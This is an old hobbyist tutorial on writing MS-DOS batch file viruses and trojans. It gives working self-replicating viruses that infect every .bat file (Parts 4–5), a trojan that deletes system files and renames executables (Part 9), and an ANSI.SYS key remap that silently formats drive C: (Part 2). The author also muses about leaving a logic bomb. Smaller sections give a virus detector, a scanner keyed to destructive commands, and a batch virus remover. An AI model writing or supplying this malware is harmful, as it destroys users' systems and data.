Part 1: Introduction


This document is written for lamerz in batch language. This explains the true basics of batch file programming. Even experienced programmers could probably learn a thing or to from this document. Now back in the good old days batch files were quite popular among virus writers because of the sheer simplicity of them. But people now days have been guided to Pascal, Delphi and C++. Those mentioned are very good and powerful programming languages but I don't know about you but I think they are boring and hard to cope with. Batch is the language for YOU! Simple to pick up and powerful at the same time. Now if you want to learn batch then keep reading other wise go back to watching Eastenders. Ok people you are the chosen ones.... Continue to the next part.



Part 2: Basic commands

Now there are loads of commands you should already know which are used in DOS. But if you dont know DOS I suggest you go get a book out from your local library and read your ass off because that is the only way to learn.

Commands listed below I hope you should already know: -

Command.com
Find.exe
Choice.com
Attrib.exe
Mem.exe
More.com
Sort.exe

Filz you should know about are: -

Autoexec.bat (especially this one would help)
Config.sys
Msdos.sys
Tmpdelis.bat
Dosstart.bat
win.ini
System.ini

Now filz such as these will help you in your understanding of batch language.

I will explain what each one does and how it can be used, are you ready...-

Command.com = the command interpreter, dos needs this to function!
Find.exe = can be used to search through almost anything for anything! (More on that later)
Choice.com = used for menu system functions e.g. a/b/c?
Attrib.exe = sets attributes on filz to make them read only or hidden
Mem.exe = Tells you about memory resources
More.com = More on this later :)
Sort.exe = Sorts data (not to sure on this one)
Autoexec.bat = start-up file processes functions and drivers needed
Config.sys = start-up file processes functions and drivers needed
Msdos.sys = same as above but go look in this one, it is interesting, go on play a little.
Tmpdelis.bat = is a windows batch file go look inside for more info...
Dosstart.bat = windows batch file used for dosprompt to load.
Win.ini/system.ini = windows initiation filz play with these and say good by to Winblows 95/98/NT

Heres some more details about some of the DOS commands:

FIND.EXE = This command is very powerful indeed. Yet to the everyday ignorant user this file means nothing! This file can search through files for specific words, through memory for specific files (tsr's) and through the bios for date, time day etc... This means i could if i wanted to see what the date is and if it is my specified date i could make my virus activate. You see where i am coming from now? It is a very powerful tool, for good and bad! In respect to the good side you could use this program to search through memory to find specific viruses such as the stoned and aircop virus, thus a virus detector!

CHOICE.COM = This file is not bad at all. It is for mainly menu systems in batch files, but can be used in other ways if the user wishes to. For instence this program can tell the difference between yes and no. It also has a delay sequence that you can activate, thus using it for timed viruses, e.g. Your Pc is going reset in 10 seconds.
This is a useful tool in viral programming, because you can get the user to activate the virus, by just pressing a key.

ANSI.SYS = This file is widley used in BFV's, it has unlimited use. Its main ability is that it can redirect keys to do commands, for example i could program the [a] key to format the hard drive. This is so powerful and dangerous, because it is so easy to do:

Prompt $e[97;"echo Y| format c:/u >nul";13p

Just that line could destroy the whole hard drive with out the user knowing. To use Ansi.sys it must be loaded into memory through config.sys file.

ATTRIB.EXE = This file is used in DOS for putting attributes on files making them read-only and/or hidden. Great concealment for bfv's.

Each command is some where along the line used in batch filz. But not all the time because they are not needed. For instance a simple batch file below, which asks the user to enter a password, needs no commands just pure batch language.

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%=='r3dhat goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=
prompt $p$g

Simple batch file, which asks the user for a password, and if they type it incorrect then the program will put them in an endless loop! Simple but effective. Other features; are that when typing the password the text colour is set to black so you cant see it then it resets the colour back to normal when finished. Erm...what else? Oh yeah it makes two files puts them together to make another batch file then runs it to set a variable into memory, then the password.bat file will look in memory to check what the user wrote to see if it is correct. Good thinking hey! Well experiment with this one can be interesting. Any bugs or improvements email me at linuxpir8@yahoo.com



Part 3: Viruses Explained

Now lets get one thing clear! A virus is not a program that gets on your hard drive by magic and then formats it.

A virus is a program, made to replicate/copy itself from one file to another. It can not infect files unless you RUN it! Most viruses come off disks or the NET and the user doesn't even realise until his MICROSOFT software decides it doesn't want to work anymore. (I THINK IT MIGHT BE BEST TO MENTION THAT I HATE MICROSOFT AND THE ONLY GOOD THING THAT HAS COME OF THEM IS MSDOS!)

Now despite my hatred towards Machosoft, i think that most viruses are aimed at Windows/x these days due to the mass numbers that use the O/S. But remember where there is Windows there is MSDOS!!! And where there is msdos there are batch filz and where there are batch filz there are my viruses.

A simple diagram: -

xxxxxxxxxxxxxx xxxxxxxxxxxxxx
x Mat156.bat x x mat156.bat x
xxxxxxxxxxxxxx xxxxxxxxxxxxxx
v virus v
vvvvvvvvvvvvvv
^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^
uninfected infected

That is the difference between the infected and the uninfected in batch filz.



Part 4: Simple Batch File Virus

Below I'm going to make up a virus then explain how it works. OK here goes....

Virus.bat

@echo off
ctty nul
for %%f in (*.bat) do copy %%f + virus.bat
ctty con

Thats it, simple infection routine that infects all batch filz in the current directory. This kind of infection is not popular among virus writers due to the way it infects. This virus will not only infect itself, but if it cant find anything to infect it will loop and re-infect all other batch filz all over again until all the memory or system resources are taken up. This is a bug but also a feature. It just appends itself on any batch file, lame but somewhat effective if used in the correct context. Try it out and play with it, as no real damage can occur. Mind you it is very quick, so if you leave it for ten seconds it probably will have infected other batch filz about 600 times. Batch file viruses are very fast. Im am now going to attempt to explain what each line does: -

@echo off - turns off the commands written in the program so the user cannot see what you are typing.
ctty nul - disables the keyboard and screen output, meaning you cant stop the virus unless you turn off your PC.
for %%f in (*.bat) do copy %%f + virus.bat - this puts the virus in all batch files in the current directory.
ctty con - re-enables the keyboard and the screen display.

Hope fully you understood all that and you are ready to go onto something more advanced.



Part 5: Advanced programming

OK here is the technical stuff. Variables! We set variables so that we can identify stuff. E.g.

set virus=*.bat

That command means that I can now say virus instead of *.bat. Meaning I can now say infect virus, instead of saying infect *.bat. May seem pointless but in the context that variables are used in it can be very powerful. Below is a virus that uses variables to infect: -

@ctty nul.LR
for %%a in (*.bat) do set LR=%%a
find "LR"<%LR% if errorlevel 1 find "LR<%0>>%LR%
ctty con.LR

This virus uses the variable LR to identify the batch file to infect. Now I will try to explain what this virus is doing in the simplest terms I can, ok you ready? Right this virus will disable the keyboard then search through all the batch filz until it reaches the last one, then it sets the variable LR to the last batch file found, ok so far so good. So now we have a variable assigned to a file. Then it searches through the file for the Key string (variable) LR and if it has it in there it wont infect it again but if it doesn't it will goto the next line. This is where the infection takes place. The virus finds the key string which you should have now guessed is LR which is on every line of the virus and then it finds the letters LR from %0 which is the current file normally the virus, and then gets all the lines with LR on them and inserts them into the file that the variable was assigned to earlier. Finally the virus then enable the keyboard for the user. Badly explained I know but try it out and put a few pause marks in the file and watch what it does! Suprisingly simple. This program is covered more clearly in my article about batch file viruses.



Part 6: Programs made in batch

I have not made that many programs in batch but use your imagination and you can. For example I earlier showed you the password file, I have also made a batch file virus remover, but what I haven't made is a virus detector. My friend at my college gave me the challenge to make a batch file that detects viruses or destructive commands so me and my big mouth took him up on the idea and came up with a lame program. Searches memory for popular memory resident viruses on a small scale, this could be enlarged to any number of viruses!

@echo off
echo [1] Stoned virus
echo [2] Aircop virus
choice /c:12
if errorlevel 2 goto aircop
:stoned
mem /c|find /i "stoned!" >nul
if errorlevel 1 goto no_virus
:virus
echo Sorry to inform you but you are infected with the stoned virus!
goto done
:no_virus
echo Congratulations man you are clean
:aircop
mem /c|find /i "Aircop" >nul
if error level 1 goto no_virus2
:virus
echo You have the Aircop virus.....Unlucky!
goto done
:no_virus2
echo You lucky son of a bitch no virus found!
:done

Very lame technique but if used on a larger scale it works really well and it tells you how much system resources the virus has taken up as well!

Alrighty then on to the real challenge, searching for destructive commands within BAT, COM, and EXE files. I did not make this program!! But phuck me it works!

@echo off
if '%2=='Loop goto loop
echo *** ANSI/BATCH SCANNER ***
set mask=%1 %2 %3 %4 %5 %6 %7 %8 %9
if '%mask%==' set mask=*.*
for %%f in (%mask%) do call %0 %%f Loop
goto done
:loop
if not exist %1 goto done
set line=
:: escape and tab characters
set esc=
set tab=
find "%esc%["<%1>nul
if not errorlevel 1 set line=%line%EscSeq
find /i "$e["<%1>nul
if not errorlevel 1 set line=%line%PromptSeq
find ";13p"<%1>nul
if not errorlevel 1 set line=%line%KeyRedef
if '%line%==' goto checkbad
find """p"<%1>nul
if not errorlevel 1 set line=%line%Key2
set hit=0
find "0p"<%1>nul
if not errorlevel 1 set hit=1
find "1p"<%1>nul
if not errorlevel 1 set hit=1
find "2p"<%1>nul
if not errorlevel 1 set hit=1
find "4p"<%1>nul
if not errorlevel 1 set hit=1
find "5p"<%1>nul
if not errorlevel 1 set hit=1
find "6p"<%1>nul
if not errorlevel 1 set hit=1
find "7p"<%1>nul
if not errorlevel 1 set hit=1
find "8p"<%1>nul
if not errorlevel 1 set hit=1
find "9p"<%1>nul
if not errorlevel 1 set hit=1
if %hit%==1 set line=%line%Key3
:checkbad
find /i "DEL "<%1>nul
if not errorlevel 1 set line=%line%Del
find /i "DELTREE"<%1>nul
if not errorlevel 1 set line=%line%Deltree
find /i "DEBUG"<%1>nul
if not errorlevel 1 set line=%line%Debug
find /i "ATTRIB "<%1>nul
if not errorlevel 1 set line=%line%Attrib
find /i "FORMAT C:"<%1>nul
if not errorlevel 1 set line=%line%Format
find /i "*.BAT"<%1>nul
if not errorlevel 1 set line=%line%BAT
find /i "*.EXE"<%1>nul
if not errorlevel 1 set line=%line%EXE
find /i "*.COM"<%1>nul
if not errorlevel 1 set line=%line%COM
echo %1 %tab%%line%
:done
set mask=
set line=
set hit=
set esc=
set tab=



Part 7: Viral writing groups

There are plenty of virus writing groups around but they all seem to be in it for fame? People that inspired me where Dark Avenger - who could program any batch file to do any thing!! Hellraiser - who hates Bill gates, but at the same time has some really good ideas, and Lucifer Messiha - who really put the v into virus. These guys dont write anymore but if they did then the viral comunity would be bowing down to them. Viral writing groups are to competetive, they are good at what they do but seem to be complete idiotic adolescents. The time i joined a writing group i thought, oh yeah im good but the reality of it was that i was not writing viruses for fun but i was writing viruses to compete. If you get to the stage that you can program a virus and you want to join a viral group then just remember the fun side of it, do it for yourself. I dont know if you've every heard of Rock Steady, but he wrote loads of viruses (destructive ones) and gave them to John mcaffee pretending he was a victim of this virus. This would then get the virus noticed and the anti virus program makes his virus well known, but at the same time it can be cured. Whta i mean is once you send in a virus the next anti-virus John brings out with have info on Rock Steadys virus. Is it worth it? He is a glory creator! By the way he turns out to be only 15 years old!!! Thats pritty much it on virus writing groups, lets now move on and go to ethics and moral matters concerning viruses.



Part 8: Ethics & morality

OK here is why i am always screwing at people about destructive viruses and trojans. Imagine yourself saving up a whole load of cash, and then buying a new software package. But to your dismay some little **** puts a destructive program on the package and it wipes your whole disk!!! Now if your hard drive contained the amount of valuable data that mine does, i tell ya you'll be pissed! imagine a whole years work from college on it being deleted! See my point. Most people that do make these programs are beginners trying to show off there power, more often than not they are lamerz! Any one can make a program to del all files (erase *), simple stuff. Now the only time destruction pops into my mind is if i get expelled from college or sacked from work i might be tempted to leave a logic bomb on a pc that went off on my bosses birthday or something. But never for nothing, its just not worth it. Alright thats enough of me blabbing on read the rest of this document and enjoy!



Part 9: Trojan story and programming Trojans

It all started off years ago, when two tribes went to war, one tribe lost. This tribe how ever never gave up, they sent a big wooden horse (trojan horse) as a token of there defeat, so when the winning tribe opened there gates and took in the horse the lost tribe jumped out from a secret hatch in the horse and defeated the tribe, thus winning in the end. They only won from concealment.

Now trojans are destructive programs that are made to look like they do good. Now programming trojans is easy but fooling the user takes the mind of a genius. This is how i would do it. I would make a trojan called setup.bat then i would make ten text filz and rename tham all to .DAT filz and pretend the package is a game. Once they run the setup.bat....BOOM trojan loaded and say goodbye. Programming trojans is easy, but getting caught is even easier. You have to make a trojan that can not only destroy filz but also destroy all traces of itself. Here is my program of how i would do it.
@echo off cd\ if exist c:\windows goto winslows if exist c:\dos goto do$ :poof erase * goto end_trojan :winblows cd\windows if exist system.ini del system.ini if exist win.ini erase win.ini ren *.exe *.vxe ren *.dat *.cat ren *.sys *.sex goto end_trojan :do$ cd\dos ren *.com *.kom ren *.exe *.com ren *.kom *.exe if exist c:\command.com erase c:\command.com :end_trojan erase trojan.bat

Extreme basics, but i tell you this would mess up your Windows system for good and Dos would have to be re-installed. Trojans are easy though, so stick to viruses and have PHUN! :)



Part 10: Endless loops for fun?

This bit is lame but what the hey this document is aimed at the lame.(no offence). Here are some simple programs which just loop:-

:loop
dir /s
goto loop

The above displays all the filz on the hard drive and dont stop!

:loop
echo Hello world my name is loopy loo!
goto loop

This one will make the text scroll down the page

@echo off
:poo
cls
echo Loopy loo needs a poo!
pause bell^G^G^G
goto poo

That one beeps in the pc and displays the text.

ok that should be enough. Read the last bit and then goto bed!



Part 11: BFV removal

These batch viruses work by adding code to the beginning and/or the end of the infected BAT files. The extra code can be removed by loading the infected batch into EDIT and deleting the additional lines. Some will create a hidden copy of themselves in the root (or other directory), use ATTRIB filename -s -r -h followed by DEL filename, filename being the actual name of the virus file. The command DIR /AH /S will show all hidden files on a drive.

Here is the code for a batch file virus remover:

@echo off
if '%1=='%temp% goto remove
echo BFV-remover version 1.0
echo =======================
echo ÿ
:start
echo ************** Batch File Virus Remover ****************
echo This will remove any batch file virus if used correctly.
echo BFV-remover will destroy batch files if they do not have
echo a virus!!! So please read the instructions first.
echo Made by l33 Rumbl3
echo ÿ
set ks=%1
set is=%2
if '%ks%==' goto exit
if '%is%==' set is=%ks%
if '%temp%==' set temp=C:\
echo Will remove %ks% from files containing %is%. Proceed?
choice /c:yn>nul
if errorlevel 2 goto exit
for %%v in (*.bat) do call %0 %temp% %%v
if exist rem$$_ del rem$$_
goto exit
:remove
find "%is%"<%2>nul
if errorlevel 1 goto done
echo Found in %2 - remove?
choice /c:yn>nul
if errorlevel 2 goto done
find /v "%ks%">%2>rem$$_
copy rem$$_ %2>nul
goto done
:exit
set is=
set ks=
:done

This program removes viruses that have a unique key, such as the pot virus and the zep virus, although both these viruses do no harm they still are a threat to your data. The major advantage about this program is that it will abstract the virus from the file so that you do not have to delete the file.

This is for batch file viruses only!! It does not work on COM or EXE files!!

Warning! If key is not unique this will destroy files!

Usage:

CLEANBAT Key1 [Key2]

...where Key1 is the UNIQUE signature used by the virus and Key2 is an identifying string. If not specified then Key2 is set to Key1

eg. to kill the skul virus goto DOS and:

type: clean skul

..and that is it, easy, look in your batch files and see if you have any thing out of the ordinary such as the words infect/vir/a certain date.